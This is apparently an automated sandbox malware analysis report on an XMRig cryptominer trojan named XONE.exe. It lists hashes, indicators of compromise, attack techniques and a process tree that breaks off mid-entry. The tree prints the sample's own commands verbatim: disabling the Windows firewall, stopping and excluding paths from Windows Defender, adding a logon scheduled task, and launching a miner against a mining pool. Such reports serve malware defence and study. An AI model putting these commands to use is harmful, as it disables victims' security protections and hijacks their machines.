xmrig | 7bfb4db002139d04fcf233d3384ba2c15c14e01d69d26327dc7ed918731b6194

Analysis

max time kernel
600s
max time network
604s
platform
windows10-2004_x64
resource
win10v2004-20240611-en
resource tags

arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
submitted
01-07-2024 17:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XONE.exe
Size

38.0MB
MD5

747325288a489b3c6863573f3e72104b
SHA1

14e39695af5942d151c008b813580160604d85e3
SHA256

7bfb4db002139d04fcf233d3384ba2c15c14e01d69d26327dc7ed918731b6194
SHA512

0258556daf1368dd58c651df6a4fd5e028a5217282a47a63b2fbbf08e20588cab57ca578e5e288868ed00ef30de2e5a43ca099aef7431d7dcac5b5d4c5436463
SSDEEP

786432:xy4byV7+uCOd9dFtuAJ1vyskeQ6T7tHckEz5lgYmErmRA+RlnS+kktWW8jz:xy4byV7+u5IATvJkb6PqL5ltm55NltWW

Score

10^/10

xmrig evasion execution miner persistence privilege_escalation trojan vmprotect

Malware Config

Signatures

Windows security bypass 2 TTPs 8 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Task Host = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Defender = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Task Host = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\Defender = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe

XMRig Miner payload 46 IoCs

miner

Processes:

resource	yara_rule
C:\ProgramData\Defender\Windows Protection.exe	family_xmrig
C:\ProgramData\Defender\Windows Protection.exe	xmrig
behavioral3/memory/6832-2768-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2769-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2770-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2771-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2772-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2773-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2774-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2775-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2776-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2777-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2778-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2779-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2780-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2781-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2782-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2783-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2784-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2785-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2786-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2787-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2788-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2789-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2790-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2791-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2792-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2793-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2794-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2795-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2796-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2797-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2798-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2799-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2800-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2801-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2802-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2803-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2804-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2805-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2806-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2807-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2808-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2809-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2810-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig
behavioral3/memory/6832-2811-0x00007FF76A260000-0x00007FF76AD5E000-memory.dmp	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

3752 netsh.exe
7156 netsh.exe

pid	process
3752	netsh.exe
7156	netsh.exe

Checks computer location settings 2 TTPs 10 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

ac.exeWScript.execmd.exeWScript.exeac1.exeWScript.exeStart.exeWScript.exeab.exeminer.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	ac.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	ac1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	Start.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	ab.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation	miner.exe

Executes dropped EXE 14 IoCs

Processes:

miner.exeab.exeac1.exeu.exeu.exed.exeac.exec1.exeStart.exed.exesvchost.exesvchost.exeWindows Protection.exeWindows Process.exe

pid process

376 miner.exe
3848 ab.exe
1740 ac1.exe
64 u.exe
1180 u.exe
1540 d.exe
1504 ac.exe
4572 c1.exe
3896 Start.exe
4408 d.exe
6376 svchost.exe
6496 svchost.exe
6832 Windows Protection.exe
6864 Windows Process.exe

pid	process
376	miner.exe
3848	ab.exe
1740	ac1.exe
64	u.exe
1180	u.exe
1540	d.exe
1504	ac.exe
4572	c1.exe
3896	Start.exe
4408	d.exe
6376	svchost.exe
6496	svchost.exe
6832	Windows Protection.exe
6864	Windows Process.exe

Loads dropped DLL 18 IoCs

Processes:

XONE.exeupdater_main.exe

pid	process
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3124	XONE.exe
3668	updater_main.exe
3668	updater_main.exe
3668	updater_main.exe
3668	updater_main.exe

VMProtect packed file 2 IoCs
Detects executables packed with VMProtect commercial packer.
vmprotect

Processes:

resource yara_rule

C:\ProgramData\Defender\Windows Process.exe vmprotect
behavioral3/memory/6864-2764-0x0000000140000000-0x0000000141B39000-memory.dmp vmprotect
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.

Processes:

resource yara_rule

C:\miner.exe autoit_exe
C:\ProgramData\Defender\c1.exe autoit_exe

resource	yara_rule
C:\ProgramData\Defender\Windows Process.exe	vmprotect
behavioral3/memory/6864-2764-0x0000000140000000-0x0000000141B39000-memory.dmp	vmprotect

resource	yara_rule
C:\miner.exe	autoit_exe
C:\ProgramData\Defender\c1.exe	autoit_exe

Drops file in System32 directory 12 IoCs

Processes:

u.exeu.exe

description	ioc	process
File opened for modification	C:\Windows\System32\GroupPolicy	u.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	u.exe
File opened for modification	C:\Windows\System32\GroupPolicy\User\Registry.pol	u.exe
File opened for modification	C:\Windows\System32\GroupPolicy\User\Registry.pol	u.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	u.exe
File opened for modification	C:\Windows\System32\GroupPolicy	u.exe
File opened for modification	C:\Windows\SysWOW64\GroupPolicy\gpt.ini	u.exe
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	u.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	u.exe
File created	C:\Windows\System32\GroupPolicy\User\Registry.pol	u.exe
File opened for modification	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	u.exe
File opened for modification	C:\Windows\System32\GroupPolicy\GPT.INI	u.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

Windows Process.exe

pid process

6864 Windows Process.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

6544 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
6864	Windows Process.exe

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

Processes:

netsh.exenetsh.exe

description	ioc	process
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4472 timeout.exe

pid	process
4472	timeout.exe

Modifies registry class 4 IoCs

Processes:

powershell.exeab.exeminer.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings	ab.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings	miner.exe
Key created	\REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings	cmd.exe

Runs net.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exeschtasks.exe

pid process

3592 schtasks.exe
6280 schtasks.exe

pid	process
3592	schtasks.exe
6280	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeWindows Process.exe

pid	process
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6864	Windows Process.exe
6864	Windows Process.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe
6544	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exeWindows Protection.exe

description pid process

Token: SeDebugPrivilege 6544 powershell.exe
Token: SeLockMemoryPrivilege 6832 Windows Protection.exe
Token: SeLockMemoryPrivilege 6832 Windows Protection.exe
Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

Windows Protection.exe

pid process

6832 Windows Protection.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Windows Process.exe

pid process

6864 Windows Process.exe
6864 Windows Process.exe
6864 Windows Process.exe
6864 Windows Process.exe

description	pid	process
Token: SeDebugPrivilege	6544	powershell.exe
Token: SeLockMemoryPrivilege	6832	Windows Protection.exe
Token: SeLockMemoryPrivilege	6832	Windows Protection.exe

pid	process
6832	Windows Protection.exe

pid	process
6864	Windows Process.exe
6864	Windows Process.exe
6864	Windows Process.exe
6864	Windows Process.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

XONE.execmd.exeupdater_main.exeupdater_main.execmd.exeminer.exeab.exeac1.exeWScript.execmd.exeac.exenet.exe

description	pid	process	target process
PID 332 wrote to memory of 3124	332	XONE.exe	XONE.exe
PID 332 wrote to memory of 3124	332	XONE.exe	XONE.exe
PID 4360 wrote to memory of 2988	4360	cmd.exe	updater_main.exe
PID 4360 wrote to memory of 2988	4360	cmd.exe	updater_main.exe
PID 2988 wrote to memory of 3668	2988	updater_main.exe	updater_main.exe
PID 2988 wrote to memory of 3668	2988	updater_main.exe	updater_main.exe
PID 3668 wrote to memory of 212	3668	updater_main.exe	cmd.exe
PID 3668 wrote to memory of 212	3668	updater_main.exe	cmd.exe
PID 212 wrote to memory of 376	212	cmd.exe	miner.exe
PID 212 wrote to memory of 376	212	cmd.exe	miner.exe
PID 212 wrote to memory of 376	212	cmd.exe	miner.exe
PID 376 wrote to memory of 3848	376	miner.exe	ab.exe
PID 376 wrote to memory of 3848	376	miner.exe	ab.exe
PID 376 wrote to memory of 3848	376	miner.exe	ab.exe
PID 3848 wrote to memory of 2416	3848	ab.exe	WScript.exe
PID 3848 wrote to memory of 2416	3848	ab.exe	WScript.exe
PID 3848 wrote to memory of 2416	3848	ab.exe	WScript.exe
PID 376 wrote to memory of 1740	376	miner.exe	ac1.exe
PID 376 wrote to memory of 1740	376	miner.exe	ac1.exe
PID 376 wrote to memory of 1740	376	miner.exe	ac1.exe
PID 1740 wrote to memory of 64	1740	ac1.exe	u.exe
PID 1740 wrote to memory of 64	1740	ac1.exe	u.exe
PID 1740 wrote to memory of 64	1740	ac1.exe	u.exe
PID 376 wrote to memory of 1180	376	miner.exe	u.exe
PID 376 wrote to memory of 1180	376	miner.exe	u.exe
PID 376 wrote to memory of 1180	376	miner.exe	u.exe
PID 376 wrote to memory of 3776	376	miner.exe	WScript.exe
PID 376 wrote to memory of 3776	376	miner.exe	WScript.exe
PID 376 wrote to memory of 3776	376	miner.exe	WScript.exe
PID 3776 wrote to memory of 1540	3776	WScript.exe	d.exe
PID 3776 wrote to memory of 1540	3776	WScript.exe	d.exe
PID 3776 wrote to memory of 2472	3776	WScript.exe	cmd.exe
PID 3776 wrote to memory of 2472	3776	WScript.exe	cmd.exe
PID 3776 wrote to memory of 2472	3776	WScript.exe	cmd.exe
PID 2472 wrote to memory of 3752	2472	cmd.exe	netsh.exe
PID 2472 wrote to memory of 3752	2472	cmd.exe	netsh.exe
PID 2472 wrote to memory of 3752	2472	cmd.exe	netsh.exe
PID 376 wrote to memory of 1504	376	miner.exe	reg.exe
PID 376 wrote to memory of 1504	376	miner.exe	reg.exe
PID 376 wrote to memory of 1504	376	miner.exe	reg.exe
PID 1504 wrote to memory of 4572	1504	ac.exe	c1.exe
PID 1504 wrote to memory of 4572	1504	ac.exe	c1.exe
PID 2472 wrote to memory of 1724	2472	cmd.exe	net.exe
PID 2472 wrote to memory of 1724	2472	cmd.exe	net.exe
PID 2472 wrote to memory of 1724	2472	cmd.exe	net.exe
PID 1724 wrote to memory of 1292	1724	net.exe	net1.exe
PID 1724 wrote to memory of 1292	1724	net.exe	net1.exe
PID 1724 wrote to memory of 1292	1724	net.exe	net1.exe
PID 2472 wrote to memory of 4228	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 4228	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 4228	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 924	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 924	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 924	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 3608	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 3608	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 3608	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 1180	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 1180	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 1180	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 1504	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 1504	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 1504	2472	cmd.exe	reg.exe
PID 2472 wrote to memory of 3592	2472	cmd.exe	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\XONE.exe
"C:\Users\Admin\AppData\Local\Temp\XONE.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:332

C:\Users\Admin\AppData\Local\Temp\XONE.exe
"C:\Users\Admin\AppData\Local\Temp\XONE.exe"
2⤵
- Loads dropped DLL
PID:3124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\\Admin\Documents\updater_main.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4360

C:\Users\Admin\Documents\updater_main.exe
C:\Users\\Admin\Documents\updater_main.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:2988

C:\Users\Admin\Documents\updater_main.exe
C:\Users\\Admin\Documents\updater_main.exe
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\\miner.exe
6⤵
- Suspicious use of WriteProcessMemory
PID:212

C:\miner.exe
C:\\miner.exe
7⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:376

C:\ProgramData\Defender\ab.exe
C:\ProgramData\Defender\ab.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
8⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3848

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\dd.vbs"
9⤵
PID:2416

C:\ProgramData\Defender\ac1.exe
C:\ProgramData\Defender\ac1.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1740

C:\ProgramData\Defender\u.exe
"C:\ProgramData\Defender\u.exe"
9⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:64

C:\ProgramData\Defender\u.exe
"C:\ProgramData\Defender\u.exe"
8⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1180

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"
8⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3776

C:\ProgramData\Defender\d.exe
"C:\ProgramData\Defender\d.exe" 70 C:\ProgramData\Defender\d1.exe
9⤵
- Executes dropped EXE
PID:1540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "
9⤵
- Suspicious use of WriteProcessMemory
PID:2472

C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3752

C:\Windows\SysWOW64\net.exe
net stop windefend
10⤵
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop windefend
11⤵
PID:1292

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f
10⤵
- Windows security bypass
PID:4228

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f
10⤵
- Windows security bypass
PID:924

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
10⤵
PID:3608

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
10⤵
PID:1180

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
10⤵
PID:1504

C:\Windows\SysWOW64\schtasks.exe
SCHTASKS /CREATE /SC ONLOGON /TN "Windows Protection" /TR "C:\ProgramData\Defender\Start.exe" /f
10⤵
- Scheduled Task/Job: Scheduled Task
PID:3592

C:\ProgramData\Defender\ac.exe
C:\ProgramData\Defender\ac.exe -pMym5DNNMnqsLhbcZaef2Zau9zuxyKFRzEav3QTVA
8⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1504

C:\ProgramData\Defender\c1.exe
"C:\ProgramData\Defender\c1.exe"
9⤵
- Executes dropped EXE
PID:4572

C:\ProgramData\Defender\Start.exe
C:\ProgramData\Defender\Start.exe
10⤵
- Checks computer location settings
- Executes dropped EXE
PID:3896

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9A95.tmp\9A96.tmp\9A97.bat C:\ProgramData\Defender\Start.exe"
11⤵
- Checks computer location settings
- Modifies registry class
PID:3960

C:\Windows\system32\timeout.exe
TIMEOUT /t 10
12⤵
- Delays execution with timeout.exe
PID:4472

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\s.vbs"
12⤵
- Checks computer location settings
PID:6368

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\s.bat" "
13⤵
PID:6460

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -executionpolicy Unrestricted C:\ProgramData\Defender\timeout.ps1
14⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6544

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\k4vekonb\k4vekonb.cmdline"
15⤵
PID:6688

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC7B0.tmp" "c:\Users\Admin\AppData\Local\Temp\k4vekonb\CSC77162FF4B59A478E91A85F309E389769.TMP"
16⤵
PID:6724

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\p.vbs"
15⤵
- Checks computer location settings
PID:6780

C:\ProgramData\Defender\Windows Protection.exe
"C:\ProgramData\Defender\Windows Protection.exe"
16⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6832

C:\ProgramData\Defender\Windows Process.exe
"C:\ProgramData\Defender\Windows Process.exe" --no-watchdog -a kawpow -o stratum+tcp://stratum.ravenminer.com:3800 -i 30 -u RRL8ppAwBsw28SR8cTZjmdyRnwaT8BC2L7.k
16⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:6864

C:\ProgramData\Task Host\svchost.exe
"C:\ProgramData\Task Host\svchost.exe"
13⤵
- Executes dropped EXE
PID:6496

C:\ProgramData\Task Host\svchost.exe
"C:\ProgramData\Task Host\svchost.exe"
12⤵
- Executes dropped EXE
PID:6376

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\d.vbs"
8⤵
- Checks computer location settings
PID:2688

C:\ProgramData\Defender\d.exe
"C:\ProgramData\Defender\d.exe" 70 C:\ProgramData\Defender\d1.exe
9⤵
- Executes dropped EXE
PID:4408

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\t.bat" "
9⤵
PID:6636

C:\Windows\SysWOW64\netsh.exe
NetSh Advfirewall set allprofiles state off
10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:7156

C:\Windows\SysWOW64\net.exe
net stop windefend
10⤵
PID:6160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop windefend
11⤵
PID:6176

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f
10⤵
- Windows security bypass
PID:6196

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Task Host" /t REG_DWORD /d 0 /f
10⤵
- Windows security bypass
PID:6212

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
10⤵
PID:5384

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
10⤵
PID:6244

C:\Windows\SysWOW64\reg.exe
